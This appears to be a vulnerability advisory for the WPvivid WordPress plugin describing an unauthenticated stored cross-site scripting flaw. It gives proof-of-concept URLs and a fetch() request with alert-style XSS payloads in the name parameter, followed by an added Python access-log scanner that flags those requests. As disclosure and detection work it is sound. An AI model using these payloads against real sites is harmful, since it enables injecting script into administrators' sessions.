The plugin does not perform authorisation checks when adding remote storages, and neither sanitises nor escapes a parameter from such unauthenticated requests before outputting it in an admin page, leading to a Stored Cross-Site Scripting issue.
As unauthenticated

v < 0.9.67
- https://example.com/?action=wpvivid_one_drive_finish_auth&name=%3Cimg%20src%20onerror=alert(/XSS/)%3E

v < 0.9.69:
- https://example.com/?action=wpvivid_google_drive_finish_auth&name=%22%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)%20x
- fetch('https://example.com/?action=wpvivid_one_drive_finish_auth&name=%3Cimg%20src%20onerror=alert(/XSS/)%3E', { method: 'POST', "headers": { "content-type": "application/x-www-form-urlencoded" }, body: 'access_token=1&refresh_token=1&expires_in=1'});

The XSS will be triggered when https://example.com/wp-admin/admin.php?page=WPvivid is accessed
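For defenders, a log check for the requests shown above, as an added example that is not part of the original advisory or the plugin's code. It assumes combined-format web server access logs; the log lines, client addresses and function names are constructed for illustration, and only the two action names and the `name` parameter come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Action names taken from the advisory's proof of concept.
ACTIONS = {"wpvivid_one_drive_finish_auth", "wpvivid_google_drive_finish_auth"}
# Characters that break out of HTML text or an attribute value, plus
# inline event-handler attributes such as onerror= or onanimationstart=.
MARKUP = re.compile(r"""[<>"']|\bon[a-z]+\s*=""", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2022:10:00:01 +0000] "POST /?action=wpvivid_one_drive_finish_auth'
    '&name=%3Cimg%20src%20onerror=alert(/XSS/)%3E HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.7 - - [01/Feb/2022:10:00:05 +0000] "GET /?action=wpvivid_google_drive_finish_auth'
    '&name=%22%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)%20x'
    ' HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.4 - - [01/Feb/2022:10:02:00 +0000] "GET /?action=wpvivid_one_drive_finish_auth'
    '&name=Office%20backups HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Feb/2022:10:03:00 +0000] "GET /wp-admin/admin.php?page=WPvivid'
    ' HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def suspicious_name(line):
    """Return the decoded name value if the line is a finish_auth request
    whose name parameter carries markup, otherwise None."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if not ACTIONS & set(query.get("action", [])):
        return None
    for name in query.get("name", []):
        if MARKUP.search(name):
            return name
    return None

def scan(lines):
    """Yield (client_ip, method, decoded_name) for every flagged line."""
    for line in lines:
        name = suspicious_name(line)
        if name is not None:
            yield line.split(" ", 1)[0], REQUEST.search(line).group("method"), name

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit shows an attempt to store markup in the storage name, not that it rendered; only the query string is inspected, because access logs do not record request bodies.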
Krzysztof Zając
Yes
2022-01-31 (about 1 year ago)
2022-04-12 (about 9 months ago)